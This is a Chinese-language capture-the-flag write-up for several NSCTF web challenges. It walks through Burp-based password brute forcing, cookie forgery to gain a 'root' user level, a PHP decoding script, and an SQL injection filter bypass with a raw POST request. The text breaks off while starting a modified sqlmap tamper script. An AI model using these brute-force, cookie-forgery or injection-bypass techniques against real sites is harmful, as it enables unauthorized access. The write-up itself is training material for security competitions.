web:
be careful:
发现有跳转,php跳转至html,flag在php页面,BP是神器。
decode:
解密脚本如下:
functiondecode($str){
$_ =base64_decode(strrev(str_rot13($str)));
for($_0=0;$_0<strlen($_);$_0++){
$_c= substr($_,$_0,1);
$__= ord($_c)-1;
$_c= chr($__);
$_o= $_o.$_c;
}
returnstrrev($_o);
}
解密后获得flag
Brute force:
有个password.txt文件,将其当作字典,用BP进行爆破,最后出来的结果nsF0cuS,进入后,说flag不在这里,看cookie,base64解码后跳转到新的网页——留言版,要以小黑的身份留言,修改cookie islogin 值为1 ,修改发言人等级 userlevel为root 成功留言,获得flag
javascript:
根据题目提示,考察点为js,查看源码发现check.js分析后获得G0od!JAVA3C41PTISAGO 1pt_Pa4sW0rd_K3y_H3re //~~~填入后获得新地址06/Ch3ck_Au7h.php发现打开后都是error,根据文件名猜测是一个验证脚本,应该是验证用户名密码的,遂用GET方式传输参数uname=G0od!JAVA3C41PTISAGO upass=1pt_Pa4sW0rd_K3y_H3re获得flag
sqli:
有filtername参数,初步分析该参数对提交的username中的字符进行过滤,填什么字符,过滤什么字符。输入’,被转义,输入%27仍旧被转义,输入%25%27,成功绕过。输入空格字符,会提示有sql注入,使用/*xx*/替换空格,仍然提示。利用filtername对/*xx*/进行构造,改造成为/ww*xxx*ww/,filtername=ww*xxx*ww/,成功绕过。
数据包为:
POST/fa81bb665474f11c025b5355582af315/web/12/index.php HTTP/1.1
Host: www.nsctf.net:8000
Cache-Control: max-age=0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.nsctf.net:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93Safari/537.36
Referer:http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/12/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Content-Type:application/x-www-form-urlencoded
Content-Length: 110
username=admi%&filtername=ww&Submit=%e6%8f%90%e4%ba%a4
需要对space2comment进行改造:
代码如下:
#!/usr/bin/env python
"""
Copyright (c) 2006-2014 sqlmap developers(http://sqlmap.org/)
See the file 'doc/COPYING' for copyingpermission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces space character (' &